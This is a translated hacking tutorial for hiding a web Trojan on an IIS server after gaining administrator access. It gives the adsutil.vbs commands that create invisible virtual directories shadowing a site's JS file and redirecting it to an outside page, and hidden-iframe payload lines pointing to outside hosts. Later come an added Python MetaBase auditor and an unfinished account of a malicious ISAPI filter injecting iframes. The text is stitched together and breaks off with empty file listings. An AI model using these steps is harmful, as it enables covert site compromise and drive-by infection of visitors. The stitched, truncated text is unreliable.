<script src=include/mm2.js></script>
Then we have a way: modify the properties of include/mm2.js! As shown in Figure 2, redirect it to one of our pages, whose content must of course be something that can be interpreted inside a script tag, such as:
document.write("<iframe style='display:none;' src=http://jnclovesw.com width=0 height=0></iframe>");
This brings in our page! Of course, it is best to also reproduce the functions of the original JS, which is enough for cover. Now the administrator will find that the home page has not changed, will see in IIS that the home page's properties have not changed, and will find that none of the files under the host's www directory have been modified. He will be very puzzled! Even if he restores the site from an earlier backup, the page will not change back, and with so many files in IIS he cannot check the properties of every one.

One point to note along the way: the file you choose to redirect must be referenced by a tag whose content gets interpreted, otherwise the redirect has no effect. For example, with <img src=1.jpg>, redirecting 1.jpg to our Trojan page is useless, because the Trojan page is not parsed as HTML but handed to the img tag as a picture. I think the tags that can be used are script and frame. CSS may also be usable, but I have not yet found a method. I do not know whether my analysis is right, and everyone is welcome to advise!

Let's continue. Suppose the administrator is good enough to notice that mm2.js has been tampered with; he will restore it from within IIS, and our dreams are shattered! Is there a more covert method, one the administrator cannot find in IIS? The answer is yes! Everyone will remember the IIS configuration vulnerability from long ago that let you create an invisible virtual directory and then build a back door inside it. We can borrow that here. The principle of that exploit is to create a virtual directory for a physical directory so that it is invisible in IIS, and then do a few tricks inside it. Here we first create an invisible virtual directory: if the home page calls a JS file under the include folder, we create the include directory. This can be done with the IIS admin scripts. The adsutil.vbs script, found in the IIS installation directory (for example under C:\Inetpub\AdminScripts), is a script that controls IIS behaviour. We use the following command:
cscript adsutil.vbs Create W3SVC/1/Root/www/include "IIsWebVirtualDir"
This creates a virtual directory that is invisible in IIS; because no path is set, it is not displayed. Then, inside this directory, create a virtual directory named mm2.js. In fact, a virtual directory name can contain special characters such as ".", like:
cscript adsutil.vbs Create W3SVC/1/Root/www/include/mm2.js "IIsWebVirtualDir"
Now there is an include/mm2.js virtual directory! What comes to mind? Its name is the same as the file the home page calls. We continue:
cscript adsutil.vbs set W3SVC/1/Root/www/include/mm2.js/httpredirect "http://jnclovesw.com/mm1.j...
This sets the redirect property of the mm2.js virtual directory, as shown in Figure 3. Note that W3SVC/1/Root/www/ stands for the www virtual directory of the first web server in IIS. If that is unclear, use the adsutil.vbs enum parameter to look up the website you need to change; for other operations, see the adsutil.vbs script help.

With the virtual directory's redirect set, now try calling include/mm2.js in the home page. Do you think the response is the content of mm2.js or of our mm1.js? The answer is mm1.js, as shown in Figure 4, and the physical file is still there! This is perhaps a characteristic of IIS: when it processes the user's request, the virtual directory takes precedence over the physical file. Then we go to IIS to check whether the include virtual directory appears. As shown in Figure 5, it does not! So we have successfully bypassed the permission restrictions and the administrator's detection. Our Trojan is planted on the other party's site, and unless they rebuild IIS or remove our hidden virtual directory, it is very difficult for them to remove it!
The article is very simple; the key is the IIS script commands and some understanding of IIS. This way of planting a Trojan is suited to use after obtaining administrator privileges, and against administrators who are merely diligent it is still very useful! When we later find that a site has a problem, remember to use this script to check whether anything is wrong there. Or simply back up the IIS settings, and when a problem occurs, restore the IIS settings as well.
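Checking the configuration instead of the web root is how an administrator catches this. The following added example (not part of the original article) audits a constructed sample written in the style of an IIS 6 MetaBase.xml export and flags virtual directories that have no physical path, are named like a file, or redirect to a host outside an allowlist; the sample data, the function name audit_metabase and the allowed_hosts parameter are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample in the style of an IIS 6 MetaBase.xml export (assumed
# format, not copied from a real server). The redirect host is a placeholder.
SAMPLE = r'''<configuration xmlns="urn:microsoft-catalog:XML_Metabase_V64_0">
<MBProperty>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT" Path="c:\inetpub\wwwroot"/>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/www" Path="d:\sites\www"/>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/www/include"/>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/www/include/mm2.js"
    HttpRedirect="http://redirect.example.invalid/placeholder.js"/>
<IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT/docs" Path="d:\sites\docs"
    HttpRedirect="/new-docs"/>
</MBProperty>
</configuration>'''

# A virtual directory whose last path segment ends like a static file.
FILE_LIKE = re.compile(r"\.(js|css|html?|asp|aspx|php|swf|jpe?g|gif|png)$", re.I)

def audit_metabase(xml_text, allowed_hosts=()):
    """Return {Location: [reasons]} for virtual directories worth reviewing."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = {}
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] != "IIsWebVirtualDir":
            continue  # ignore other metabase key types
        loc = el.get("Location", "")
        reasons = []
        if not el.get("Path", "").strip():
            reasons.append("no-path")          # nothing on disk backs it
        if FILE_LIKE.search(loc):
            reasons.append("file-like-name")   # shadows a file of that name
        # HttpRedirect may carry flags after a comma; keep only the URL.
        target = el.get("HttpRedirect", "").split(",")[0].strip()
        host = urlparse(target).hostname
        if host and host.lower() not in allowed:
            reasons.append("offsite-redirect:" + host.lower())
        if reasons:
            findings[loc] = reasons
    return findings

if __name__ == "__main__":
    for location, why in audit_metabase(SAMPLE).items():
        print(location, "->", ", ".join(why))
```

Each finding is a prompt for review, not proof of compromise; a redirect to a relative path on the same site, like the docs entry in the sample, is not flagged.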
<iframe src="http://xxxdfsfd/web.htm&qu... height=0 width=0></iframe>
Code of this kind usually sits in the head section, and the antivirus reports a virus as soon as the page is opened.
Opening the source of the HTML, ASP or PHP pages, this code is nowhere to be found.
The first suspect was JS, but half a day of searching found nothing; a newly created HTML page that is linked in also gets this piece of code.
Looking carefully, the problem should be in IIS. Open IIS (restart it once), right-click the main IIS node, choose Properties, then ISAPI, and find an ISAPI extension not seen before.
Its path is c:\windows\help\wanps.dll, and the ISAPI shows as loaded normally (green status).
Remove it, restart IIS, and all the code disappears.
The loaded item consists of three files:
wanps.ini content is:
wanps.txt content: